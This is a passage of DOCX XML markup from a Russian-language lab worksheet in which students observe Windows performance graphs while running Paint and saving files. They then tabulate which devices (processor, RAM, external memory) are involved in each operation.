        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения графика кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="3175"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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Завершите работу программы MS Word.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>После каждого из следующих действий переходите к окну с диаграммами, замечайте, что изменилось (между действиями выдерживайте небольшую паузу, чтобы отделить на диаграмме одно действие от другого):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>запустите Paint;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">перейдите к окну </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Производительность</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> и нажмите клавишу Print Screen, чтобы поместить картинку с экрана в буфер обмена;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>вставьте картинку из буфера обмена в документ программы Paint;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>сохраните файл с картинкой;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>завершите работу программы Paint;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Остановите изменения отображения кнопкой </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="187325" cy="245110"/>
            <wp:effectExtent l="19050" t="0" r="317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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Сделайте еще один </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>снимок</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> диаграмм и поместите именно его в ваш отчет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подпишите на диаграммах (на тех участках, где происходят изменения), какие действия вы выполняли.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00A64EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создайте на листе вашего отчета таблицу и заполните ее исходя из показаний графика: поставьте плюс, если устройство участвует в операции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При исследовании участия устройства в операциях выделяйте соответствующий график , используя кнопку выделить </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="288290" cy="288290"/>
            <wp:effectExtent l="1905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67" cstate="print"/>
                    <a:srcRect l="43181" t="10612" r="54172" b="85550"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="288290" cy="288290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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92"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="2393"/>
        <w:gridCol w:w="2393"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidTr="004B6AD5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="284"/>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Действие</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="284"/>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Процессор</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="284"/>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Оперативная память</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="284"/>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Внешняя память</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidTr="004B6AD5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="284"/>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Запуск программы</w:t>
            </w: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r>
      <w:tr w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidTr="004B6AD5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="284"/>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Редактирование документа</w:t>
            </w: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r>
      <w:tr w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidTr="004B6AD5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="284"/>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Сохранение документа</w:t>
            </w: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r>
      <w:tr w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidTr="004B6AD5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="284"/>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Завершение работы программы</w:t>
            </w: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c>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="284"/>
                <w:tab w:val="left" w:pos="851"/>
              </w:tabs>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:bCs/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="004B6AD5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B6AD5" w:rsidRPr="00617AC0" w:rsidRDefault="004B6AD5" w:rsidP="00E656E5">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Поскольку производительность компьютера главным образом определяется ресурсами процессора и памяти, следует понимать, как программы используют эти ресурсы. </w:t>
      </w:r>
    </w:p>
